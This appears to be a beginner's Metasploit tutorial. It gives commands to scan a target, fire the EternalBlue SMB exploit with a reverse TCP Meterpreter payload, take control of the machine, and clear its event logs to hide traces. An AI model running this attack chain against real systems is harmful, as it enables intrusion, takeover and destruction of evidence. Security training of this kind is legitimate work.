Disclaimer
⚠️ This guide is strictly for educational purposes and cybersecurity awareness. Unauthorized hacking is illegal and punishable by law. Always use Metasploit on systems you have permission to test.
What is Metasploit?
Metasploit is a powerful framework used by security professionals to test system vulnerabilities. It allows ethical hackers to simulate real-world attacks to strengthen cybersecurity defenses.
Installing Metasploit
Metasploit comes pre-installed in Kali Linux, but you can install it manually on other operating systems.
For Kali Linux (Recommended): Metasploit is included in Kali Linux, but if needed, install it using:
sudo apt update && sudo apt install metasploit-framework -y
For Windows: Download the installer from the official Metasploit website and follow the on-screen instructions.
Launching Metasploit
After installation, launch Metasploit by opening a terminal and typing:
msfconsole
This will start the Metasploit framework and display its command-line interface.
Scanning the Target
Before exploiting a system, we need to gather information. This process is called reconnaissance.
Using Nmap, scan the target machine to find open ports and services:
nmap -sV -A <target-ip>
This command provides details about the target’s services, operating system, and vulnerabilities.
Choosing an Exploit
After scanning, we can look for exploits that match the discovered vulnerabilities.
For example, to search for SMB-related exploits, type:
search exploit smb
Metasploit will return a list of potential exploits. Choose the most relevant one by typing:
use exploit/windows/smb/ms17_010_eternalblue
This selects the "EternalBlue" exploit, which targets an SMB vulnerability in older Windows versions.
Configuring the Exploit
Before launching an attack, we need to set up the target IP and payload.
Set the target machine’s IP address:
set RHOST <target-ip>
Set the attacker's local IP address:
set LHOST <your-ip>
To find your IP, use the command ifconfig (Linux) or ipconfig (Windows).
Set the payload:
set payload windows/meterpreter/reverse_tcp
The payload determines what happens once the system is exploited. The "reverse TCP" payload opens a connection back to the attacker's system.
Check all settings:
show options
This command verifies that everything is correctly configured.
Running the Exploit
Once all settings are correct, execute the exploit:
exploit
If the attack is successful, Metasploit will open a session on the target system, giving access to its files and commands.
Post-Exploitation
After gaining access, various commands can be executed:
Check system details:
sysinfo
Displays the target machine’s OS, architecture, and other system details.
List running processes:
ps
Shows all currently running processes on the target machine.
Take a screenshot:
screenshot
Captures the screen of the target system.
Open a command shell:
shell
Opens a direct command-line interface on the target machine, allowing full control.
Covering Tracks and Exiting
To avoid leaving traces on the target system, clear the event logs:
clearev
Exit the session cleanly:
exit
Conclusion
Metasploit is a powerful tool for ethical hacking and security testing. It allows security professionals to find and fix vulnerabilities before malicious hackers exploit them. Always use it responsibly and within legal boundaries.